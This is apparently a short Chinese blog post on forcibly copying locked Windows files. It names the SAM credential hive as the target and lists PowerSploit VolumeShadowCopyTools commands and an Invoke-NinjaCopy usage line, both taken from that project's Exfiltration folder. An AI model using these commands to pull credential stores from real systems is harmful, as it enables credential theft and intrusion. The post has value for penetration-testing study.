遇到想要复制一个被占用的文件或者是系统文件,诸如c:\windows\system32\config\sam,正常情况下是不能复制的。请教了一下大牛,cate4cafe给我讲了一下。

  • 姿势一 VolumeShadowCopyTools
    来自:Powersploit的VolumeShadowCopyTools https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/VolumeShadowCopyTools.ps1
    1.New-VolumeShadowCopy -Volume C:\
    2.Get-VolumeShadowCopy
    3.Mount-VolumeShadowCopy -Path C:\Users\public -DevicePath \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 //挂载到C:\Users\public目录下
    4.Remove-VolumeShadowCopy -DevicePath \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

  • 姿势二 Invoke-NinjaCopy
    来自:Powersploit的Invoke-NinjaCopy
    https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1

    Invoke-NinjaCopy -Path <需要复制的文件> -LocalDestination <复制文件保存位置>
    

One Reply to “强制复制windows文件”

发表评论

电子邮件地址不会被公开。 必填项已用*标注